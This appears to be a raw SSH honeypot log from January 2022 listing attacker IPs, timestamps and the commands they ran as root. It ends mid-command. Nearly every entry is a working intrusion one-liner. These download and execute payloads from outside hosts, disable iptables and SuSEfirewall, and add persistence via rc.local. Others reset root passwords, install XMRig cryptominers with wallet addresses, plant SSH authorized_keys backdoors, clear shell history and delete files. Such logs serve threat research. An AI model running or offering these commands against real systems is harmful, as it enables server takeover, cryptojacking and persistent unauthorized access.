From 45.125.34.131 2-Jan-2022 00:17:32 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://45.147.26.129:8082/BT chmod 777 BT ./BT echo "cd /tmp/">>/etc/rc.local echo "./BT ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 45.125.34.131 2-Jan-2022 01:22:10 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://45.147.26.129:8082/BT chmod 777 BT ./BT echo "cd /tmp/">>/etc/rc.local echo "./BT ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://45.147.26.129:8082/BT;chmod 777 BT;./BT;echo "cd /tmp/">>/etc/rc.local;echo "./BT&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://45.147.26.129:8082/BT chmod 777 BT ./BT echo "cd /tmp/">>/etc/rc.local echo "./BT ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 164.90.230.201 2-Jan-2022 01:22:23 ssh2 root Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo wget https://www.nasapaul.com/ninfo curl -O https://www.nasapaul.com/ninfo chmod 777 * ./ninfo From 222.186.133.160 2-Jan-2022 02:41:42 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.133.160:8090/gnmd chmod 777 gnmd ./gnmd echo "cd /tmp/">>/etc/rc.local echo "./gnmd ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.133.160:8090/gnmd chmod 777 gnmd ./gnmd echo "cd /tmp/">>/etc/rc.local echo "./gnmd ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.133.160:8090/gnmd chmod 777 gnmd ./gnmd echo "cd /tmp/">>/etc/rc.local echo "./gnmd ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.186.133.160 2-Jan-2022 02:41:42 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/gnmd;chmod 777 gnmd;./gnmd;echo "cd /tmp/">>/etc/rc.local;echo "./gnmd&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.133.160:8090/gnmd chmod 777 gnmd ./gnmd echo "cd /tmp/">>/etc/rc.local echo "./gnmd ">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 188.164.177.173 2-Jan-2022 07:47:15 ssh2 root Exec help help From 140.246.20.243 2-Jan-2022 17:13:12 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s From 164.92.221.220 3-Jan-2022 03:24:54 ssh2 root Exec wget nasapaul.com/ninfo ; chmod +x ninfo ; ./ninfo wget nasapaul.com/ninfo chmod +x ninfo ./ninfo From 178.128.203.54 3-Jan-2022 10:20:01 ssh2 root Exec nproc;uname -s -n -r -i nproc uname -s -n -r -i From 209.141.54.15 3-Jan-2022 10:56:12 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://23.95.222.119/obins.sh chmod 777 obins.sh sh obins.sh tftp 23.95.222.119 -c get otftp1.sh chmod 777 otftp1.sh sh otftp1.sh tftp -r otftp2.sh -g 23.95.222.119 chmod 777 otftp2.sh sh otftp2.sh rm -rf obins.sh otftp1.sh otftp2.sh rm -rf * From 164.90.230.201 3-Jan-2022 16:16:20 ssh2 root Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo wget https://www.nasapaul.com/ninfo curl -O https://www.nasapaul.com/ninfo chmod 777 * ./ninfo From 209.141.54.15 4-Jan-2022 17:25:05 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://209.141.54.15/zbins.sh; chmod 777 zbins.sh; sh zbins.sh; tftp 209.141.54.15 -c get ztftp1.sh; chmod 777 ztftp1.sh; sh ztftp1.sh; tftp -r ztftp2.sh -g 209.141.54.15; chmod 777 ztftp2.sh; sh ztftp2.sh; rm -rf zbins.sh ztftp1.sh ztftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://209.141.54.15/zbins.sh chmod 777 zbins.sh sh zbins.sh tftp 209.141.54.15 -c get ztftp1.sh chmod 777 ztftp1.sh sh ztftp1.sh tftp -r ztftp2.sh -g 209.141.54.15 chmod 777 ztftp2.sh sh ztftp2.sh rm -rf zbins.sh ztftp1.sh ztftp2.sh rm -rf * From 165.22.195.82 4-Jan-2022 20:52:27 ssh2 root Exec echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G echo root:12wsafdsf4rwr234r32w|chpasswd|bash uname -a curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G From 167.99.209.141 6-Jan-2022 05:58:28 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://greektaverna.tk/sh curl -O http://greektaverna.tk/sh chmod 777 sh sh sh tftp greektaverna.tk -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g greektaverna.tk chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 167.172.43.16 6-Jan-2022 13:48:27 ssh2 root Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 42yvmZB43FH6d9pccfUvBo9Kne6QCP9RhepyjGeqoYeh2zF4XXrVDFi4fGydEUyFPhJEZWhp22LuCWSYEPeeKQp6PXwwW3G From 209.141.54.15 6-Jan-2022 21:05:15 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.54.15/wget.sh; curl -O http://209.141.54.15/wget.sh; chmod 777 wget.sh; sh wget.sh; tftp 209.141.54.15 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 209.141.54.15; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 ftp.sh ftp.sh; sh ftp.sh; rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.54.15/wget.sh curl -O http://209.141.54.15/wget.sh chmod 777 wget.sh sh wget.sh tftp 209.141.54.15 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 209.141.54.15 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 ftp.sh ftp.sh sh ftp.sh rm -rf wget.sh tftp1.sh tftp2.sh ftp.sh rm -rf * From 111.175.57.228 8-Jan-2022 04:29:56 ssh2 root Exec echo -n jy05jpqb|md5sum;uname -a echo -n jy05jpqb|md5sum uname -a From 165.22.195.82 8-Jan-2022 12:50:17 ssh2 root Exec echo root:12wsafdsf4rwr234r32w|chpasswd|bash; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s echo root:12wsafdsf4rwr234r32w|chpasswd|bash uname -a curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s From 178.138.98.184 10-Jan-2022 03:17:31 ssh2 root fuck you From 185.37.209.49 10-Jan-2022 04:37:54 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 cd mkdir .ssh cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k mv .ssh/.auth_k .ssh/authorized_keys From 50.212.157.1 10-Jan-2022 06:29:46 ssh2 root lscpu w reboot /sbin/shutdown hahah fucking asshole :)) From 142.44.132.124 10-Jan-2022 09:43:54 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.222.116.91/huh.sh; curl -O http://51.222.116.91/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 51.222.116.91 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 51.222.116.91; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.222.116.91 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://51.222.116.91/huh.sh curl -O http://51.222.116.91/huh.sh chmod 777 huh.sh sh huh.sh tftp 51.222.116.91 -c get huh.sh chmod 777 huh.sh sh huh.sh tftp -r huh2.sh -g 51.222.116.91 chmod 777 huh2.sh sh huh2.sh ftpget -v -u anonymous -p anonymous -P 21 51.222.116.91 huh1.sh huh1.sh sh huh1.sh rm -rf huh.sh huh.sh huh2.sh huh1.sh rm -rf * From 156.226.21.27 11-Jan-2022 01:37:04 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.99.6.111:1023/Q85;chmod 777 Q85;./Q85; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.99.6.111:1023/Q85 chmod 777 Q85 ./Q85 Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.99.6.111:1023/Q85;chmod 777 Q85;./Q85; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://118.99.6.111:1023/Q85 chmod 777 Q85 ./Q85 From 209.141.43.126 11-Jan-2022 05:09:41 ssh2 root Exec cat /etc/issue; cd /tmp/; wget http://179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; history -c cat /etc/issue cd /tmp/ wget http://179.43.175.83/x86_64 chmod 777 x86_64 ./x86_64 x86xhed history -c From 209.141.43.126 11-Jan-2022 05:49:27 ssh2 root Exec cat /etc/issue; cd /tmp/; wget http://179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed; history -c cat /etc/issue cd /tmp/ wget http://179.43.175.83/x86_64 chmod 777 x86_64 ./x86_64 x86xhed history -c From 134.209.83.158 11-Jan-2022 21:05:15 ssh2 root Exec echo root:3G4gRrRrtD3 | chpasswd; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s echo root:3G4gRrRrtD3 | chpasswd uname -a curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s From 139.59.11.135 12-Jan-2022 07:22:34 ssh2 root Exec (cd /tmp; wget -qO - 135.125.148.26/bash|perl; curl -s 135.125.148.26/bash|perl > /dev/null) (cd /tmp wget -qO - 135.125.148.26/bash|perl curl -s 135.125.148.26/bash|perl > /dev/null) From 134.209.83.158 12-Jan-2022 16:27:55 ssh2 root Exec echo root:3G4gRrRrtD3 | chpasswd; uname -a; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL echo root:3G4gRrRrtD3 | chpasswd uname -a curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47v9mKikPcCZCq5mDn71ssWLDQ9UkrbiE2Tgu37BueHCHULTp5F6eHG1PA7X6o5RrW3tLjKVaCKrt23ATHn25hyy81iXQVL From 43.245.222.62 12-Jan-2022 21:18:43 ssh2 root Exec uptime uptime From 46.97.177.4 13-Jan-2022 02:57:45 ssh2 root w uname -a ifconfig cat /etc/passwd cat /etc/issue cat /etc/issue cat /etc/hosts uname -a cat /proc/cpuinfo arp -a php -v yum inatsll php -y apt-get install php php -v apt-get install php -y php -v w cd .ssh ls -a cd /root ls -a From 198.98.49.124 13-Jan-2022 03:00:03 ssh2 root Exec cat /etc/issue; cd /tmp/; wget http://176.126.175.75/thatoneguy.sh; chmod 777 thatoneguy.sh; sh thatoneguy.sh;curl --referer https://miner.com http://54.36.242.76/ cat /etc/issue cd /tmp/ wget http://176.126.175.75/thatoneguy.sh chmod 777 thatoneguy.sh sh thatoneguy.sh curl --referer https://miner.com http://54.36.242.76/ From 45.153.160.2 13-Jan-2022 03:00:27 ssh2 root ls ls -as cd .ssh ls apt-get update apt-get install apache2 apt-get install php apt-get install php7.0-xml apt-get install php7.0-sqlite3 apt-get install libapache2-mod-php sudo systemctl reload apache2 sudo systemctl restart apache2 sudo apt install python-certbot-apache -y apt-get install php-curl history -c -y cd /var/www/html ls -a cd /var/www ls nano a unset HISTFILE unset HISTSAVE unset HISTLOG unset history -n unset WATCH mkdir -p /root/.ssh rm -rf /root/.ssh/authorized_keys touch /root/.ssh/authorized_keys echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEA5b13N4Wos3kc9BR0TcrIlFnUwm6pQ4Dgef+akHeOnlgvhddhlzJzrg5dH3fdYZnuiMKzSJr6vZbqQRXYDX3Se6YYjs65PBZiUmGj+34sdbZZ/WmLbvpqCWfzwGPB6qhfMQZD4rsBJK9vlgNdppZwoX5TiuBfOljcIU5YoCGnG8qtIogGjH88dh/602fwr4k9WJBUMxDwNgOBDr6efhQCFmF0Re2lO7KlHP5y4QRY0OS27GY1THRIKjrgDCi8qrplR+Ly7yDlOC2naLciSeiBypOP0MIwpH80XVXJ3sHV9l2Zc5aAPbHeluUrV4vzMntVpvs05CbIh2o2OmMOXx5ccQ== rsa-key-20201019' >> /root/.ssh/authorized_keys dc /root ls From 46.97.177.4 13-Jan-2022 03:03:14 ssh2 root perl ls -as cd /root ls -as cd .ssh ls cd .ssh ls -as cd Mail ls ps x 2 ./startx From 46.97.177.4 13-Jan-2022 03:04:35 ssh2 root w uname -a From 167.172.43.16 13-Jan-2022 10:12:43 ssh2 root Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s From 115.75.37.29 14-Jan-2022 06:12:44 ssh2 root Exec ls ls From 179.43.187.70 14-Jan-2022 12:17:52 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/1a9zxq/7ega.x86; cat 7ega.x86 > x86; chmod +x x86; chmod 777 *; ./x86 rooted.x86; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://179.43.187.99/1a9zxq/7ega.x86 cat 7ega.x86 > x86 chmod +x x86 chmod 777 * ./x86 rooted.x86 history -c From 179.43.187.70 14-Jan-2022 12:19:48 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/cometome; cat cometome > rooted; chmod +x rooted; chmod 777 *; ./rooted; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://179.43.187.99/cometome cat cometome > rooted chmod +x rooted chmod 777 * ./rooted history -c From 36.7.159.10 14-Jan-2022 16:21:17 ssh2 root Exec nproc;uname -a;cd /usr/include/;curl -O http://198.199.127.168/apache64;cd /usr/include/;mv apache64 ssl;chmod +x ssl;./ssl;history -c nproc uname -a cd /usr/include/ curl -O http://198.199.127.168/apache64 cd /usr/include/ mv apache64 ssl chmod +x ssl ./ssl history -c From 206.189.102.12 14-Jan-2022 23:57:25 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://greektaverna.tk/sh curl -O http://greektaverna.tk/sh chmod 777 sh sh sh tftp greektaverna.tk -c get bins.sh chmod 777 bins.sh sh bins.sh tftp -r .sh -g greektaverna.tk chmod 777 .sh sh .sh ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh sh .sh rm -rf sh bins.sh .sh .sh rm -rf * From 173.212.236.155 15-Jan-2022 19:14:57 ssh2 root Exec '/bin/sh' '/bin/sh' From 198.98.49.124 16-Jan-2022 08:24:08 ssh2 root Exec crontab -r;pkill xmrig;pkill brrr;pkill wget;mkdir /tmp/OneMan/;cd /tmp/OneMan/;wget http://176.126.175.75/runme.sh;curl http://176.126.175.75/runme.sh -o runme.sh;wget http://85.239.33.9/Nully/arm7;curl http://85.239.33.9/Nully/arm7 -o arm7; chmod 777 arm7;./arm7 UwU-7;chmod 777 runme.sh;sh runme.sh;curl --referer https://uwu-MM.com http://54.36.242.76/ crontab -r pkill xmrig pkill brrr pkill wget mkdir /tmp/OneMan/ cd /tmp/OneMan/ wget http://176.126.175.75/runme.sh curl http://176.126.175.75/runme.sh -o runme.sh wget http://85.239.33.9/Nully/arm7 curl http://85.239.33.9/Nully/arm7 -o arm7 chmod 777 arm7 ./arm7 UwU-7 chmod 777 runme.sh sh runme.sh curl --referer https://uwu-MM.com http://54.36.242.76/ From 206.189.103.89 16-Jan-2022 18:16:32 ssh2 root Exec cd /tmp ; mkdir .x ; cd .x ; wget http://20.106.163.35/cnrig ; curl -O http://20.106.163.35/cnrig ; chmod +x cnrig ; mv cnrig systemd ; ./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B ; echo DONE cd /tmp mkdir .x cd .x wget http://20.106.163.35/cnrig curl -O http://20.106.163.35/cnrig chmod +x cnrig mv cnrig systemd ./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B echo DONE From 123.177.42.158 17-Jan-2022 15:30:24 ssh2 root Exec echo -n 21sao2o4|md5sum;uname -a echo -n 21sao2o4|md5sum uname -a From 43.154.103.13 17-Jan-2022 18:25:38 ssh2 root Exec command -v curl command -v curl From 194.163.133.196 18-Jan-2022 02:36:11 ssh2 root Exec uname -s -v -n -r -m uname -s -v -n -r -m From 209.141.54.15 18-Jan-2022 12:22:11 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.54.15/Pemex.sh; curl -O http://209.141.54.15/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 209.141.54.15 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 209.141.54.15; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://209.141.54.15/Pemex.sh curl -O http://209.141.54.15/Pemex.sh chmod 777 Pemex.sh sh Pemex.sh tftp 209.141.54.15 -c get Pemex.sh chmod 777 Pemex.sh sh Pemex.sh tftp -r Pemex2.sh -g 209.141.54.15 chmod 777 Pemex2.sh sh Pemex2.sh ftpget -v -u anonymous -p anonymous -P 21 209.141.54.15 Pemex1.sh Pemex1.sh sh Pemex1.sh rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh rm -rf * From 119.91.250.212 19-Jan-2022 02:59:23 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 uname -a cd /tmp curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ From 119.91.250.212 19-Jan-2022 03:07:50 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 uname -a cd /tmp curl -s -L http://212.71.238.141/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 From 81.68.123.185 19-Jan-2022 14:35:01 ssh2 root Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa 